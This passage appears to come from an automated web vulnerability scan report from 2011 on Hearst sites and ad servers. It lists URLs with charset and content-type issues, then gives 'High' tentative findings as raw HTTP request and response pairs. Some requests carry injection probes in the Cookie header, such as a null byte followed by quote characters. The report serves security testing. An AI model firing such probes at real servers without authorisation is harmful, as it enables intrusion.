24.5. http://a.rfihub.com/nai_check_status.gif
24.6. http://a.tribalfusion.com/j.ad
24.7. http://ad.amgdgt.com/ads/
24.8. http://ad.auditude.com/adserver
24.9. http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer/qo
24.10. http://ad.turn.com/server/ads.js
24.11. http://ad.yieldmanager.com/imp
24.12. http://adreq.bizographics.com/i
24.13. http://ads.amgdgt.com/ads/opt-out
24.14. http://ads.undertone.com/fc.php
24.15. http://adserver.teracent.net/tase/ad
24.16. http://adsfac.us/ag.asp
24.17. http://advertising.aol.com/nai/nai.php
24.18. http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js
24.19. http://amch.questionmarket.com/dt/s/28067/0.php
24.20. http://api.twitter.com/1/statuses/user_timeline.json
24.21. http://api.zap2it.com/tvlistings/zcConnector.jsp
24.22. http://as.serving-sys.com/OptOut/nai_optout_results.aspx
24.23. http://as1.suitesmart.com/102386/G14531.js
24.24. http://b.rad.msn.com/ADSAdClient31.dll
24.25. http://b.scorecardresearch.com/r
24.26. http://bs.serving-sys.com/BurstingPipe/adServer.bs
24.27. http://c.brightcove.com/services/viewer/federated_f9
24.28. http://cdn.turn.com/server/ddc.htm
24.29. http://cdn1.manilla.com/wp-content/themes/manilla-1.2/css/jquery.fancybox.1.3.4.css
24.30. http://ce.lijit.com/merge
24.31. http://cim.meebo.com/cim
24.32. http://cm.g.doubleclick.net/pixel
24.33. http://cm.npc-hearst.overture.com/js_1_0/
24.34. http://dc.kaboodle.com/b/ss/kaboodlecom/1/H.2-pdv-2/s98178625190630
24.35. http://dis.criteo.com/dis/optoutstatus.aspx
24.36. http://domdex.com/nai_optout_status.php
24.37. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_4_2/StdBanner.js
24.38. http://ellegirl.elle.com/
24.39. http://events.adchemy.com/visitor/auuid/nai-status
24.40. http://events.seattlepi.com/partner_json/search
24.41. http://events.stamfordadvocate.com/partner_json/search
24.42. http://fetchback.com/serve/fb/optout
24.43. http://fls.doubleclick.net/activityi
24.44. http://g-pixel.invitemedia.com/gmatcher
24.45. http://googleads.g.doubleclick.net/pagead/ads
24.48. http://hearstmagazines.112.2o7.net/b/ss/hmagglobal/1/H.22.1--NS/0
24.49. http://hfm.checkm8.com/adam/detect
24.50. http://img.pulsemgr.com/optout
24.51. http://internetmarketing.localedge.com/
24.52. http://load.exelator.com/load/OptOut.php
24.53. http://loadus.exelator.com/load/
24.54. http://login.dotomi.com/ucm/UCMController
24.55. http://metrics.elle.com/b/ss/hcfellegirlprod/1/H.15.1/s92564277239143
24.56. http://metrics.seattlepi.com/b/ss/hearstseattlepi/1/H.21/s91569553883746
24.57. http://nai.ad.us-ec.adtechus.com/nai/daa.php
24.58. http://nai.adserver.adtechus.com/nai/daa.php
24.59. http://nai.adserverec.adtechus.com/nai/daa.php
24.60. http://nai.adserverwc.adtechus.com/nai/daa.php
24.61. http://nai.adsonar.com/nai/daa.php
24.62. http://nai.adtech.de/nai/daa.php
24.63. http://nai.advertising.com/nai/daa.php
24.64. http://nai.btrll.com/nai/status
24.65. http://nai.glb.adtechus.com/nai/daa.php
24.66. http://nai.tacoda.at.atwola.com/nai/daa.php
24.67. http://o.sa.aol.com/b/ss/aolamn,aolsvc/1/H.21/s96658798141233
24.68. http://omnituretrack.local.com/b/ss/ic-hulk2010production/1/H.17/s91523811360821
24.69. http://optout.33across.com/api/
24.70. http://optout.cognitivematch.com/optoutStatus
24.71. http://optout.crwdcntrl.net/optout/check.php
24.72. http://optout.invitemedia.com:9030/check_optout
24.73. http://optout.media6degrees.com/orbserv/NAIStatus
24.74. http://optout.mxptint.net/naistatus.ashx
24.75. http://origin.chron.com/apps/audit/ads.gif
24.76. http://p.opt.fimserve.com/nai_check.jsp
24.77. http://pbid.pro-market.net/engine
24.78. http://pixel.fetchback.com/serve/fb/optout
24.79. http://pixel.quantserve.com/api/segments.json
24.80. http://ps2.newsinc.com/players/GetZoneID/90009.xml
24.81. http://r.skimresources.com/api/
24.82. http://r.turn.com/r/optout
24.83. http://rad.msn.com/ADSAdClient31.dll
24.84. http://rt.legolas-media.com/lgrt
24.85. http://s.xp1.ru4.com/coop
24.86. http://s.ytimg.com/yt/swfbin/cps-vflP_j6Bm.swf
24.87. http://s0.2mdn.net/666472/Amex_Midas_NoBlackout_728x90.swf
24.89. http://safebrowsing.clients.google.com/safebrowsing/gethash
24.90. http://sana.newsinc.com/sana.html
24.91. http://sensor2.suitesmart.com/sensor4.js
24.92. http://services.hearstmags.com/registration/get_hearst_user.js
24.93. http://spe.atdmt.com/ds/UXUJ3UMJ3NYS/WaveForChange_BTS2011/JJ_NW_300x250_Spin.swf
24.94. http://syn.verticalacuity.com/varw/getPromo
24.95. http://t.invitemedia.com/track_imp
24.96. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642
24.97. http://tcr.tynt.com/javascripts/Tracer.js
24.98. http://test.ctpost.com/beacon/error
24.99. http://tm.verticalacuity.com/vat/visitT
24.100. http://toolbarqueries.clients.google.com/tbproxy/af/query
24.101. http://um.simpli.fi/an
24.102. http://us.bc.yahoo.com/b
24.103. http://vms.msn.com/vms.aspx
24.104. http://www.adbrite.com/mb/nai_optout_check.php
24.105. http://www.addthis.com/api/nai/status
24.106. http://www.bizographics.com/nai/status
24.107. http://www.burstnet.com/cgi-bin/opt_out_check.cgi
24.108. http://www.casalemedia.com/cgi-bin/naiOptout.cgi
24.109. http://www.chron.com/apps/adWiz/adWiz.mpl
24.110. http://www.delish.com/
24.111. http://www.facebook.com/plugins/like.php
24.112. http://www.fetchback.com/resources/naicheck.php
24.113. http://www.gather.com/
24.114. http://www.google-analytics.com/__utm.gif
24.115. http://www.google.com/cse/brand
24.116. http://www.kaboodle.com/
24.118. http://www.localedge.com/wdpsearch/localedgebusinesssearch.htm
24.119. http://www.manilla.com/
24.120. http://www.mathtag.com/cgi-bin/optout
24.121. http://www.mediaplex.com/status_pure.php
24.122. http://www.meebo.com/cim/sandbox.php
24.123. http://www.misquincemag.com/
24.124. http://www.pulse360.com/behavior/nai-opt-out.html
24.125. http://www.quickandsimple.com/
24.126. http://www.realage.com/default.aspx
24.127. http://www.realmedia.com/cgi-bin/nph-verify_oo.cgi
24.128. http://www.seattlepi.com/
24.129. http://www.seventeen.com/
24.130. http://www.stamfordadvocate.com/
24.131. http://www.thedailygreen.com/
24.132. http://www.timesunion.com/
24.133. http://www.tribalfusion.com/optout/verify.js
24.134. http://www.ugo.com/cm/ugo/css/ugo-global.css
24.135. http://www.youtube-nocookie.com/v/IOje-N90P38&hl=en_US&fs=1&
24.136. http://www.zvents.com/misc/widgets/20645.js
24.137. http://www2.glam.com/app/site/affiliate/nc/gs-optout.act
24.138. http://y.timesunion.com/b/ss/hearstalbanytu/1/H.21/s97295546184759
25. HTML does not specify charset
25.1. http://a.collective-media.net/
25.2. http://a.collective-media.net/favicon.ico
25.3. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3
25.4. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5
25.5. http://ad.doubleclick.net/adi/N1558.NetMining/B4742075.6
25.6. http://ad.doubleclick.net/adi/N5019.284127.DBGVIDEONETWORK/B5621714
25.7. http://ad.doubleclick.net/adi/N6257.274732.SEATTLEPI-NNN/B5824230.2
25.8. http://ad.doubleclick.net/adi/N6257.274732.SEATTLEPI-NNN/B5824230.3
25.9. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.30
25.10. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.31
25.11. http://ad.doubleclick.net/pfadx/seventeen_cim/
25.12. http://adreq.bizographics.com/i
25.13. http://adsfac.us/ag.asp
25.14. http://advertising.aol.com/nai/nai.php
25.15. http://amch.questionmarket.com/adscgen/d_layer.php
25.16. http://amch.questionmarket.com/adscgen/dynamiclink.js.php
25.17. http://amch.questionmarket.com/adscgen/st.php
25.18. http://an.tacoda.net/an/slf.htm
25.19. http://api.uproxx.com/ulink/feed
25.20. http://bs.serving-sys.com/BurstingPipe/adServer.bs
25.21. http://content.pulse360.com/535BB4CE-7CD8-11E0-8B1F-79D9E4064C68
25.22. http://contextweb.pixel.invitemedia.com/context_sync
25.23. http://corporate.local.com/mk/get/advertising-opportunities
25.24. http://corporate.local.com/mk/get/contact-us
25.25. http://d3.zedo.com/jsc/d3/ff2.html
25.26. http://fls.doubleclick.net/activityi
25.28. http://hearst.com/about-hearst/corporate-george-r-hearst-jr.php
25.29. http://hearst.com/about-hearst/corporate-mark-e-aldam.php
25.30. http://hearst.com/about-hearst/index.php
25.31. http://hearst.com/newspapers/albany-times-union.php
25.32. http://hearst.com/newspapers/hearst-news-service.php
25.33. http://hearst.com/newspapers/index.php
25.34. http://hearst.com/newspapers/localedge.php
25.35. http://hearst.com/newspapers/metrix4media.php
25.36. http://hearst.com/newspapers/seattlepicom.php
25.37. http://hearst.com/newspapers/the-advocate.php
25.38. http://hearst.com/press-room/index.php
25.39. http://hearst.com/press-room/pr-20110817a.php
25.40. http://hfm.checkm8.com/adam/detect
25.41. http://loadus.exelator.com/load/net.php
25.43. http://metrix4media.com/
25.44. http://networkadvertising.org/consumer/opt_out.asp
25.45. http://pbid.pro-market.net/engine
25.46. http://sana.newsinc.com/sana.html
25.47. http://sensor2.suitesmart.com/sensor4.js
25.48. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/donatemydress_us
25.49. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us
25.50. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf
25.51. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626
25.52. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642
25.53. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100
25.54. http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686626
25.55. http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686642
25.56. http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61721100
25.57. http://tags.bluekai.com/site/2187
25.58. http://tracker.u-link.me/ut_.js
25.59. http://video.od.visiblemeasures.com/log
25.60. http://widget.newsinc.com/ndn_toppicks.html
25.61. http://www.delish.com/api_static/twitter.json
25.62. http://www.donatemydress.org/
25.63. http://www.metrix4media.com/
25.64. http://www.metrix4media.com/solutions.html
25.65. http://www.misquincemag.com/misquincepp-quinceanera-2009-mis-quince-insert
25.66. http://www.networkadvertising.org/managing/opt_out.asp
25.67. http://www.networkadvertising.org/managing/optout_results.asp
25.68. http://www.quickandsimple.com/pp-qas-2011-9-7
25.69. http://www.realage.com/glossary.json
25.70. http://www.realage.com/promo-player-homepage-2011-03-25
25.71. http://www.seventeen.com/api_static/twitter.json
25.72. http://www.thedailygreen.com/api_static/twitter.json
25.73. http://www.thedailygreen.com/homezipfeed/
25.74. http://www.thedailygreen.com/promo-homepage-110916
25.75. http://www.tribalfusion.com/test/opt.js
25.76. http://www.ugo.com/takeover/takeover.html
25.77. http://www.ugo.com/xd_receiver.htm
26. Content type incorrectly stated
26.1. http://a.rad.msn.com/ADSAdClient31.dll
26.2. http://a1.interclick.com/getInPageJS.aspx
26.3. http://a1.interclick.com/getInPageJSProcess.aspx
26.4. http://ad.doubleclick.net/pfadx/seventeen_cim/
26.5. http://adserver.teracent.net/tase/ad
26.6. http://amch.questionmarket.com/adscgen/d_layer.php
26.7. http://amch.questionmarket.com/adscgen/dynamiclink.js.php
26.8. http://amch.questionmarket.com/adscgen/st.php
26.9. http://api.uproxx.com/ulink/feed
26.10. http://api.uproxx.com/ulink/template.js
26.11. http://api.zap2it.com/tvlistings/zcConnector.jsp
26.12. http://b.rad.msn.com/ADSAdClient31.dll
26.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs
26.14. http://content.pulse360.com/535BB4CE-7CD8-11E0-8B1F-79D9E4064C68
26.15. http://ellegirl.elle.com/wp-content/themes/thesis/custom/images/hearst-logo.png
26.16. http://event.adxpose.com/event.flow
26.17. http://events.seattlepi.com/partner_json/search
26.18. http://events.stamfordadvocate.com/partner_json/search
26.19. http://flesler-plugins.googlecode.com/files/jquery.localscroll-1.2.7-min.js
26.20. http://goku.brightcove.com/1pix.gif
26.21. http://hearst.com/flash/slideshow-home.xml
26.22. http://hearst.com/flash/slideshow-newspapers.xml
26.23. http://hfm.checkm8.com/adam/detect
26.24. http://html5form.googlecode.com/svn/trunk/jquery.html5form-min.js
26.25. http://o.aolcdn.com/os_merge/
26.26. http://ps2.newsinc.com/Playlist/show/90009/1709/507.xml
26.27. http://ps2.newsinc.com/players/GetZoneID/90009.xml
26.28. http://r.skimresources.com/api/
26.29. http://rad.msn.com/ADSAdClient31.dll
26.30. http://seattlepi.ux.hearstdigitalnews.com/favicon.ico
26.31. http://sensor2.suitesmart.com/sensor4.js
26.32. http://stamfordadvocate.ux.hearstdigitalnews.com/favicon.ico
26.33. http://thumbnail.newsinc.com/23529630.sf.jpg
26.34. http://tracker.u-link.me/ut_.js
26.35. http://ua.uproxxcdn.com/CXBetoHkoRG7G0E.png
26.36. http://ua.uproxxcdn.com/DZ2iEV7OFqoJUqT.png
26.37. http://ua.uproxxcdn.com/FKOcJyHi3WPtNW3.png
26.38. http://ua.uproxxcdn.com/RagyhhqntMN7eO5.png
26.39. http://ua.uproxxcdn.com/WiYUAs3s08PJENf.png
26.40. http://ua.uproxxcdn.com/r63wMetmtJgpwY8.jpg
26.41. http://video.od.visiblemeasures.com/log
26.42. http://vms.msn.com/vms.aspx
26.43. http://www.delish.com/api_static/twitter.json
26.44. http://www.delish.com/delish-network-tout.json
26.45. http://www.delish.com/promo-player-homepage-2011-9-15
26.46. http://www.facebook.com/extern/login_status.php
26.47. http://www.kampyle.com/favicon.ico
26.48. http://www.local.com/skins/default/images/locm_transhadow_v001.jpg
26.49. http://www.meebo.com/mcmd/events
26.50. http://www.meebo.com/mcmd/subscribe
26.51. http://www.misquincemag.com/misquincepp-quinceanera-2009-mis-quince-insert
26.52. http://www.quickandsimple.com/pp-qas-2011-9-7
26.53. http://www.realage.com/glossary.json
26.54. http://www.realage.com/promo-player-homepage-2011-03-25
26.55. http://www.seattlepi.com/mediaManager/
26.56. http://www.seventeen.com/api_static/twitter.json
26.57. http://www.stamfordadvocatedailydeals.com/favicon.ico
26.58. http://www.stamfordadvocatedailydeals.com/widgets/a
26.59. http://www.thedailygreen.com/api_static/twitter.json
26.60. http://www.thedailygreen.com/promo-homepage-110916
26.61. http://www.tribalfusion.com/test/opt.js
27. Content type is not specified
27.2. http://ad.technoratimedia.com/st
27.3. http://pcm1.map.pulsemgr.com/uds/pc
27.4. http://www.meebo.com/cmd/btproviders
27.5. http://www.meebo.com/cmd/tc
27.6. http://www.meebo.com/mcmd/start
Severity: | High |
Confidence: | Tentative |
Host: | http://ad.doubleclick.net |
Path: | /adj/DY146/ron_lifestyle |
GET /adj/DY146/ron_lifestyle Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.misquincemag User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=OPT_OUT |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 3564 Set-Cookie: id=c2102423c000027||t P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: test_cookie=CheckFor Date: Sat, 17 Sep 2011 16:38:31 GMT Expires: Sat, 17 Sep 2011 16:38:31 GMT Cache-Control: private document.write('<IFRAME SRC=\"http://ad ...[SNIP]... 033469%3B4307-300/250 ...[SNIP]... |
GET /adj/DY146/ron_lifestyle Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.misquincemag User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=OPT_OUT |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 1712 Set-Cookie: id=cd801423c0000f8||t P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: test_cookie=CheckFor Date: Sat, 17 Sep 2011 16:38:33 GMT Expires: Sat, 17 Sep 2011 16:38:33 GMT Cache-Control: private document.write('<IFRAME SRC=\"http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://ad.doubleclick.net |
Path: | /adj/hdm.quicksimple |
GET /adj/hdm.quicksimple Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.quickandsimple User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=OPT_OUT%00' |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7122 Set-Cookie: id=c6bf8413c00006d||t P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: test_cookie=CheckFor Date: Sat, 17 Sep 2011 16:35:22 GMT Expires: Sat, 17 Sep 2011 16:35:22 GMT Cache-Control: private document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Sep 01 13:12:40 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y else if (window.ActiveXObject && window.execScript){ window.execScript('on error resume next\npVM=2\ndo\npVM=pVM ...[SNIP]... |
GET /adj/hdm.quicksimple Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.quickandsimple User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=OPT_OUT%00'' |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 278 Set-Cookie: id=c7bf8413c0000a6||t P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: test_cookie=CheckFor Date: Sat, 17 Sep 2011 16:35:23 GMT Expires: Sat, 17 Sep 2011 16:35:23 GMT Cache-Control: private document.write(''); admeld_publisher = 303; admeld_site = 'hearst_us'; admeld_size = '728x90'; admeld_placement = 'quickandsimple_us'; document.write('\n<script type=\"text/javascript ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://api.uproxx.com |
Path: | /ulink/feed |
GET /ulink/feed?pid=163&limit Host: api.uproxx.com Proxy-Connection: keep-alive Referer: http://www.ugo.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=e21911b30c |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:34:49 GMT Server: Apache Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 4563 UPROXXJSON( [{"category":"Web Culture","content_title": ...[SNIP]... e_favicon":"http:\/\/www ...[SNIP]... |
GET /ulink/feed?pid=163&limit Host: api.uproxx.com Proxy-Connection: keep-alive Referer: http://www.ugo.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=e21911b30c |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:34:49 GMT Server: Apache Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 4548 UPROXXJSON( [{"category":"Web Culture","content_title": ...[SNIP]... e_favicon":"http:\/\/www ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://hfm.checkm8.com |
Path: | /adam/detect |
GET /adam/detect?cat=hfmus.eg Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: dt=97,20110917162454,OS |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:50:38 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: NY-AD3 Set-cookie: A=dqR5Y9wSL3KUv9UJ7MTba Set-cookie: C=okL6Y9wbG5Y1caaJaS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-id: 156333621/1230474426 x-internal-selected: x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
GET /adam/detect?cat=hfmus.eg Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: dt=97,20110917162454,OS |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:50:38 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: NY-AD3 Set-cookie: C=okL6Y9wbG5Y1caaKaS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-id: 156333621/1230474426 x-internal-selected: x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
Severity: | High |
Confidence: | Tentative |
Host: | http://hfm.checkm8.com |
Path: | /adam/detect |
GET /adam/detect?cat=hfmus.eg Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: dt=97,20110917162454,OS |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:50:45 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: NY-AD2 Set-cookie: A=dqR5Y9wCJ38Sv9UJ7MTba Set-cookie: C=orL6Y9wx3NQ0caabbS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-id: 153976775/1228210170 x-internal-selected: x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
GET /adam/detect?cat=hfmus.eg Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: dt=97,20110917162454,OS |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:50:45 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: NY-AD2 Set-cookie: C=orL6Y9wx3NQ0caacbS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-id: 153976775/1228210170 x-internal-selected: x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
Severity: | High |
Confidence: | Tentative |
Host: | http://hfm.checkm8.com |
Path: | /adam/detect |
GET /adam/detect?cat=hfmus.eg Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: dt=97,20110917162454,OS |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:50:42 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: NY-AD2 Set-cookie: A=dqR5Y9wCJ38Sv9UJ7MTba Set-cookie: C=onL6Y9wx3NQ0caaYaS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-id: 153976775/1228210170 x-internal-selected: x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
GET /adam/detect?cat=hfmus.eg Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: dt=97,20110917162454,OS |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:50:42 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: NY-AD2 Set-cookie: C=onL6Y9wx3NQ0caaZaS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-id: 153976775/1228210170 x-internal-selected: x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
Severity: | High |
Confidence: | Tentative |
Host: | http://hfm.checkm8.com |
Path: | /adam/detect |
GET /adam/detect?cat=hfmus.eg Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: dt=97,20110917162454,OS |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:51:06 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: NY-AD2 Set-cookie: A=dqR5Y9wdH68Sv9UJ7MTba Set-cookie: C=oML6Y9wx3NQ0caascS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-id: 153976775/1228215787 x-internal-selected: x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
GET /adam/detect?cat=hfmus.eg Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: dt=97,20110917162454,OS |
